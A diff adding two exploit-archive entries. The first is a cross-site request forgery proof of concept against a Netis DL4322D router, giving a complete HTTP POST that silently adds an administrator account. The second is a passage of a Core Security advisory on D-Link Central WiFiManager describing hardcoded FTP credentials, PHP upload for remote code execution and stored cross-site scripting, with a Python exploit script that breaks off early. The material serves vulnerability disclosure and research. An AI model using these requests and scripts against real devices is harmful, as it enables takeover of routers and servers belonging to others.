diff --git a/exploits/hardware/webapps/45532.txt b/exploits/hardware/webapps/45532.txt new file mode 100644 index 000000000..6a8bb75f0 --- /dev/null +++ b/exploits/hardware/webapps/45532.txt @@ -0,0 +1,42 @@ +# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin) +# Author: Cakes +# Discovery Date: 2018-10-01 +# Vendor Homepage: http://www.netis-systems.com +# Software Link: http://www.netis-systems.com/Home/detail/id/74.html +# Tested Version: RTK 2.1.1 +# Tested on OS: Kali Linux +# CVE: N/A + +# Description +# Due to improper session management an attacker is able to add a administrator account +# without providing any authentication credentials. + +# PoC 1 +POST /form2userconfig.cgi HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 112 + +username=Cakes&privilege=2&newpass=1234&confpass=1234&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send + +# PoC 2 + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/45533.txt b/exploits/php/webapps/45533.txt new file mode 100644 index 000000000..c8021a4fc --- /dev/null +++ b/exploits/php/webapps/45533.txt @@ -0,0 +1,315 @@ +Core Security - Corelabs Advisory +http://corelabs.coresecurity.com/ + +D-Link Central WiFiManager Software Controller Multiple Vulnerabilities + +1. *Advisory Information* + +Title: D-Link Central WiFiManager Software Controller Multiple +Vulnerabilities +Advisory ID: CORE-2018-0010 +Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities +Date published: 2018-10-04 +Date of last update: 2018-10-04 +Vendors contacted: D-Link +Release mode: Coordinated release + +2. *Vulnerability Information* + +Class: Unrestricted Upload of File with Dangerous Type [CWE-434], +Improper Authorization [CWE-285], Improper Neutralization of Input +During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper +Neutralization of Input During Web Page Generation +('Cross-site Scripting') [CWE-79] +Impact: Code execution +Remotely Exploitable: Yes +Locally Exploitable: Yes +CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441 + +3. *Vulnerability Description* + +D-Link's website states that: + +[1] Central WiFiManager Software Controller helps network administrators +streamline their wireless access point (AP) management workflow. Central +WiFiManager is an innovative approach to the more traditional +hardware-based multiple access point management system. It uses a +centralized server to both remotely manage and monitor wireless APs on a +network. + +Vulnerabilities were found in the Central WiFiManager Software +Controller, allowing unauthenticated and authenticated file upload with +dangerous type that could lead to remote code execution with system +permissions. Also, two stored Cross Site Scripting vulnerabilities were +found. + +4. *Vulnerable Packages* + + . Central WifiManager v1.03 + +Other products and versions might be affected, but they were not tested. + +5. *Vendor Information, Solutions and Workarounds* + +D-Link released the following Beta version that addresses the reported vulnerabilities: + + . Central WifiManager v 1.03r0100-Beta1 + +In addition, D-Link published a security note in: +https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092 + +6. *Credits* + +These vulnerabilities were discovered and researched by Julian Muñoz +from Core Security Consulting Services. The publication of this advisory +was coordinated by Leandro Cuozzo from Core Advisories Team. + +7. *Technical Description / Proof of Concept Code* + +D-Link Central WiFiManager Software Controller exposes an FTP server +that serves by default in port 9000 and has hardcoded credentials +(admin, admin). Taking advantage of this fact, we will upload a PHP file +in the '/web/public' directory and then, by requesting this file, will +be able to execute arbitrary code on the target system (shown in 7.1). + +On 7.2 we show a similar attack to but in this case with an +authenticated user in the web application. The application has a +functionality to upload a .rar file used for the captive portal +displayed by the Access Points. We will craft a .rar with a PHP file +that we will end up executing in the context of the web application. +When the .rar is uploaded is stored in the path "\web\captivalportal" in +a folder with a timestamp created by the PHP time() function. In order +to know what is the web server's time we request an information file +that contains the time we are looking for. After we have the server's +time we upload the .rar, calculate the proper epoch and request the +appropriate path increasing this epoch by one until we hit the correct +one. + +Finally, we discovered two Cross-Site Scripting, one on the update site +functionality, in the 'sitename' parameter (7.3) and the other one on +the creation of a local user in the 'username' parameter (7.4). + +7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of +File with Dangerous Type* + +[CVE-2018-17440] The web application starts an FTP server running on the +port 9000 by default with admin/admin credentials and do not show the +option to change it, so in this POC we establish a connection with the +server and upload a PHP file. Since the application do not restrict +unauthenticated users to request any file in the web root, we later +request the uploaded file to achieve remote code execution. + +/----- +import requests +from ftplib import FTP + +#stablish connection with FTP server +host_ip = "127.0.0.1" +ftp = FTP() +ftp.connect(host=host_ip